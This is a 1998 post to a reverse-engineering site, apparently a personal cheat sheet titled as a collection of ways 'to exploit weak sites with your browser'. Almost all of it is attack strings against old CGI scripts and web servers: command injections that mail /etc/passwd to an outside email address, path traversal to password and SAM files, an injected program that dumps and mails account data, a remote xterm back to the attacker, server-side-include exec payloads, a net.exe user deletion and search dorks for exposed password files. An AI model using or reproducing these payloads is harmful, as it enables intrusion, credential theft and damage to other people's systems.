courtesy of fravia+'s page of reverse engineering
12 November 1998
hi fravia+, this is my collection of "how to exploit weak sites with your browser" i'm working an a document which includes very new exploits .. i'll let you know when it is ready ... haveaniceday RUDICARELL # test cgi's /cgi-bin/test-cgi?\whatever /cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd /cgi-bin/test-cgi?/* /cgi-bin/test-cgi?* HTTP/1.0 /cgi-bin/test-cgi?x * /cgi-bin/nph-test-cgi?* HTTP/1.0 /cgi-bin/nph-test-cgi?x * # jj /cgi-bin/jj?pwd=SDGROCKS&pop=0&name=rudi&adr=elder4&phone=4523534~/bin/ls # betterones /cgi-bin/info2www?(../../../../../../../bin/mail [email protected] </etc/passwd) /cgi-bin/blabla?%0a/bin/cat%20/etc/passwd /cgi-bin/finger?[email protected]%3B%2Fbin%2Fmail+[email protected]+%3C+etc%2Fpasswd /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd /cgi-bin/phf?%0a blablabla &Qalias=&Qname=&Qemail=&Qnickname=&Qoffice_phone= ... usw /cgi-bin/php.cgi?/etc/passwd /cgi-bin/fi?/etc/passwd /cgi-bin/wais.pl/set%20Gopher=/bin/cat%20/etc/passwd /cgi-bin/webdist.cgi?/bin/mail%20:/etc/passwd[[email protected]] /cgi-bin/textcounter.pl?/;IFS=\8;(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|echo;echo| # other stuff /dir/doit.phtml?/home/ftp/incoming/executemycode.phtml /cgi-bin/AnyForm2? ...??? /cgi-bin/infogate? ...??? /cgi-bin/test.bat?&dir .... netscape server /scripts/test.bat+%26dir+%26time+%26abracadabra.exe .... netscape server # microfuck /guti.asp::$DATA asp ...... /global.asa asp ...... # long filenames :) /somewhere/VERYLON~.HTM .... user save verylongyy.htm file # quid pro quo server /site.name/server%20logfile .... quid pro quo - server # basic auth and others /cgi-bin/www-sql/protected_directory/irgendwas.html /cgi-bin/htmlscript?../../../../../../etc/passwd /cgi-bin/campas?%0acat%0a/etc/passwd%0a /cool-logs/mlog.html?screen=/etc/passwd /cool-logs/mylog.html?screen=/etc/passwd /cgi-bin/view-source?../../../../../../../etc/passwd /cgi-bin/webgais Content-length: (laenge des exploits) query=';mail+rudicarell\@hotmail.com</etc/passwd;echo'&output=subject&domain=paragraph # sgi silicon graphics /cgi-bin/handler/carelli;cat /etc/passwd|?data=Download (sgis! nur tabs!) /cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|' (sgis!) /cgi-bin/pfdispaly.cgi?/../../../../etc/motd (sgis! alte version) /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5rudicarell\@hotmail.com\</etc/passwd;eval$CMD;echo # frontpage extensions www.domain.com/beliebiges_directory/_vti_cnf = directory www.domain.com/_vti_pvt = world writeable # old but still working IIS perl.exe nt/scripts/perl.exe?%20-e%20"system%20('dir%20c:\\winnt35\\repair');" # example bor bad perl oa ;xterm -display my.ip.address:0 & john;echo "#include \"pwd.h\"">/tmp/shadow.c john;echo "main(){struct passwd *p;while(p=getpwent())">>/tmp/shadow.c john;echo "printf(\"%s:%s:%d:%d:%s:%s:%s\\n\",p->pw-name,">>/tmp/shadow.c john;echo "p->pw_passwd,p->pw_uid,p->pw_gid,p->pw_gecos,">>/tmp/shadow.c john;echo "p->pw_dir,p->pw_shell);}">>/tmp/shadow.c john;cc -o /tmp/shadow /tmp/shadow.c john;/tmp/shadow>>/tmp/passwd john;/bin/cat /tmp/passwd|/bin/mail [email protected] john;rm /tmp/shadow*;rm /tmp/passwd # sometimes its really bad ~root ~root/etc/passwd (zum beispiel) altavista .... url:etc AND link:passwd ... oder ... root: 0:0 url:.htaccess .. oder .. url:.htpasswd # NCSA files httpd.conf configure the httpd service srm.conf scripts and documents reside access.conf service features for all browsers .htaccess Limits access on a directory-by-directory basis http .... bla bla /.htaccess (NCSA .........) # microfuck http ... bla bla .. /scripts/blabla.bat?&dir+c:\+?&time test.bat+%26dir+%26time+%26pfieffer.exe # novell http ... bla bla .. /files.pl? ../../blabla http ... bla bla .. /scripts/convert.bas?../../any_file_on_sys_volume # MAC WEBSTAR http ... bla bla .. /M_A_C_H_T_T_P_V_E_R_S_I_O_N # lotus domino server (this is really cool) http ... /domcfg.nsf/?open htto ... /domcfg.nsf/URLRedirect/?OpenForm http:... /database.nsf/viewname?SearchView&Query="*" # nt carbo server **** http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog #example for server side includes anon-ftp upload**** <!--#exec cmd="/bin/ls"--> <!--#exec cmd="mail [email protected] < cat /etc/passwd"--> <!--#exec cmd="chmod 777 ~ftp/incoming/uploaded_hack_script"--> <!--#exec cmd="~ftp/incoming/uploaded_hack_script"--> <!--#exec cmd="find / -name foobar -print"--> <!--#include file="schweinenasenfile" --> # metaweb servers http://mail.server.com:5000/../smusers.txt http://mail.server.com:5000/../../winnt/repair/sam._ http://mail.server.com:5000/../../winnt/system32/net.exe? http://mail.server.com:5000/../../winnt/system32/net.exe?user%20joe%20/delete port:2040 = javaconfig port:5000 = mail port:5001 = -"- http://www.metainfo.com/products/sendmail/users.htm http://www.metainfo.com/products/metaip/users.htm # verity search software ****** s97_cgi.exe?Action=FormGen&ServerKey=Primary&Template=irgendwas (nt) search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/hosts&ResultStyle=simple&ResultCount=20&collection=books # uaaa |-) zhhhh wwwboard.html /wwwboard/passwd.txt **** wwwadmin.pl oder wwwadmin.cgi # cgi von hylafax *** /cgi-bin/faxsurvey?/bin/ls%20-a # other microfuck uploader.exe/ # new lotus-domino http://www.server.com/database.nsf/viewname?SearchView&Query="*" /*end*/